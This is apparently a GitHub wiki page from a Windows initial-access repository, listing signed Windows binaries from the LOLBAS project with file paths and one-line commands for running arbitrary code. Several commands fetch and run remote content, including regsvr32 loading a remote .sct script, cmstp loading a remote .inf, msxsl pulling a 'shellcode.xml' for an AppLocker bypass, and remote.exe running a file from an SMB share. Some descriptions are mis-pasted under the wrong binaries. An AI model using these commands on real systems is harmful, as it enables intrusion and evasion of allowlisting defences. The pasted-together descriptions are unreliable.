LOLBAS - hegusung/Windows-Initial-Access GitHub Wiki
This section list some interesting entries of the LOLBAS website. Non exhaustive list
https://lolbas-project.github.io/
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Windows\System32\cmstp.exe
- C:\Windows\SysWOW64\cmstp.exe
cmstp.exe /ni /s c:\cmstp\CorpVPN.infcmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=fooExecution:- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll- Windows 10S, Windows 11
- C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
Microsoft.Workflow.Compiler.exe tests.xml results.xml- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
- C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Build and execute a C# project stored in the target XML file.
msbuild.exe pshell.xmlExecutes generated Logger DLL file with TargetLogger export
msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,FooExecute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
msbuild.exe project.proj- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Windows\System32\Msdt.exe
- C:\Windows\SysWOW64\Msdt.exe
Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Loads the target .DLL file and executes the RegisterClass function.
regasm.exe AllTheThingsx64.dllLoads the target .DLL file and executes the UnRegisterClass function.
regasm.exe /U AllTheThingsx64.dll- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Loads the target .DLL file and executes the RegisterClass function.
regsvcs.exe AllTheThingsx64.dll- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Execute the specified remote .SCT script with scrobj.dll.
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dllExecute the specified local .SCT script with scrobj.dll.
regsvr32.exe /s /u /i:file.sct scrobj.dll- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- C:\Program Files (x86)\Windows Kits\10\bin*\x86\AccChecker\AccCheckConsole.exe
- C:\Program Files (x86)\Windows Kits\10\bin*\x64\AccChecker\AccCheckConsole.exe
- C:\Program Files (x86)\Windows Kits\10\bin*\arm\AccChecker\AccCheckConsole.exe
- C:\Program Files (x86)\Windows Kits\10\bin*\arm64\AccChecker\AccCheckConsole.exe
Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll- Windows 7 and up with .NET installed
- C:\Program Files\dotnet\dotnet.exe
Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
dotnet.exe [PATH_TO_DLL]dotnet.exe msbuild [Path_TO_XML_CSPROJ]- Windows
- No default
Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
msxsl.exe customers.xml script.xslmsxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xmlmsxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o <filename>- Windows
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Spawns powershell as a child process of remote.exe
Remote.exe /s "powershell.exe" anythinghereRun a remote file (WebDAV or SMB ?)
Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere- Windows
- C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\tracker.exe
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe